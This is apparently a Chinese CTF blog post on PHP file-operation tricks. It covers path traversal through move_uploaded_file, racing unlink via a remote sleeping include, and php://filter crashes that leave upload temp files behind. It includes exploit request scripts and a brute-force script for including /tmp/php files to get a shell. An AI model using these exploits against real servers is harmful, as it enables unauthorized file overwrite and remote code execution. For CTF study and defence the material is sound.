关于php文件操作的几个小trick

记录一些ctf题目中近期遇到的一些文件操作trick,不定时更新

1.move_uploaded_file

一般用来保存上传的文件,第二个参数一般是最终保存的文件名,针对此函数,若在一定条件下$new_name完全可控,即可以穿越路径,可以对已经存在的文件进行覆盖。

假设正常文件内容如下:

<?php
$filename=$_FILES['file']['name'];
var_dump($filename);
if(file_exists($filename)){
echo "no!";
}else{
echo "yes!";
move_uploaded_file($_FILES['file']['tmp_name'],$filename);
}

exp.py测试:

import requests
files=[('file',('xx/../over.php',"<?php phpinfo();?>"))]
print requests.post(url="http://127.0.0.1/test/move.php",files=files).content

假如此时已经有over.php,这种情况下xx/../over.php来覆盖是无效的,这里$filename获取到的还是over.php

 但是此时若代码如下:

<?php
$filename=$_POST['name'];
var_dump($filename);
if(file_exists($filename)){
echo "no!";
}else{
echo "yes!";
move_uploaded_file($_FILES['file']['tmp_name'],$filename);
}

传入的文件名是post传进来的,那么此时xx/../over.php即可达到覆盖的效果。

那么over.php/.能不能进行覆盖呢?结果如下:

exp.py

import requests
files=[('file',('xx/../over.php',"<?php phpinfo();?>"))]
print requests.post(url="http://127.0.0.1/test/move.php",files=files,data={"name":"over.php/."}).content

此时虽然绕过了file_exists()函数,此时判断该文件不存在,但是move保存文件时此时会判断文件存在,因此无法覆盖,所以只能用xx/../over.php来绕过,并且一般正常的上传文件流程里文件名都是通过$_FILES['file']['name']来获取的,基本没有直接$_POST文件名来上传。

2.unlink函数+move_uploaded_file函数

 unlink函数用来删除文件,如果我们已经能够上传webshell,但是后面又有unlink,那么此时第一反应肯定是条件竞争

首先当上传的文件名是 xx/. 或者 xx/../xx.php时 unlink时都会将/前面的视作目录,那么肯定会删除失败,

但是move_uoload_file函数能够直接保存该上传的文件,前提当然是文件名是$_POST方式传入的,这两种文件名都能够生成新的文件。

 竞争方法:

如果unlink之前存在include($a),并且$a可控,并且allow_url_fopen

$a的值为vps 上的一个 php 脚本,这个脚本只需要 sleep 就行了,比如http://x.x.x.x/sleep.php

sleep.php

<?php
sleep(9999);

然后同时上传文件,并访问文件来getshell

3.include()

①php://filter/string.strip_tags

php7.0的bug

include.php?file=php://filter/string.strip_tags/resource=/etc/passwd

使用php://filter/string.strip_tags导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,再进行文件名爆破就可以getshell

该方法仅适用于以下php7版本,php5并不存在该崩溃:

• php7.0.0-7.1.2可以利用, 7.1.2x版本的已被修复

• php7.1.3-7.2.1可以利用, 7.2.1x版本的已被修复

• php7.2.2-7.2.8可以利用, 7.2.9一直到7.3到现在的版本已被修复

②.convert.quoted-printable-encode

这个崩溃并不适用于include,require等函数,适用于file函数,file_get_contents函数,readfile函数

• php7.0.0-7.0.32

• php7.0.4-7.2.12

• php<=5.6.38的版本

5.6.39-5.6.9以内的版本并不存在这个崩溃

<?php
file_get_contents($_GET[a]);

payload:
index.php?a=php://filter/convert.quoted-printable-encode/resource=/etc/passwd

在包含的同时要给此存在文件包含的php文件post一个文件,然后用脚本去爆破这个文件即可。

放一个xctf final的exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import string

charset = string.digits + string.letters

host = "10.99.99.16"
port = 80
base_url = "http://%s:%d" % (host, port)


def brute_force_tmp_files():
    for i in charset:
        for j in charset:
            for k in charset:
                for l in charset:
                    for m in charset:
                        for n in charset:
                            filename = i + j + k + l + m + n
                            url = "%s/index.php?function=extract&file=/tmp/php%s" % (base_url, filename) #url根据实际情况改下参数就行
                            print url
                            try:
                                response = requests.get(url)
                                if 'wwwwwwwwwwwwww' in response.content: #可以利用burp 多线程上传文件  
                                    print "[+] Include success!"
                                    return True
                            except Exception as e:
                                print e
    return False


def main():
    brute_force_tmp_files()


if __name__ == "__main__":
    main()

③自包含

也就是自己包含自己,比如index.php?file=index.php,这样也会生成临时文件,但是这样不够稳定,影响服务器性能,推荐前面两种方法。

posted @ 2019-08-05 16:12  tr1ple  阅读(1074)  评论(0编辑  收藏  举报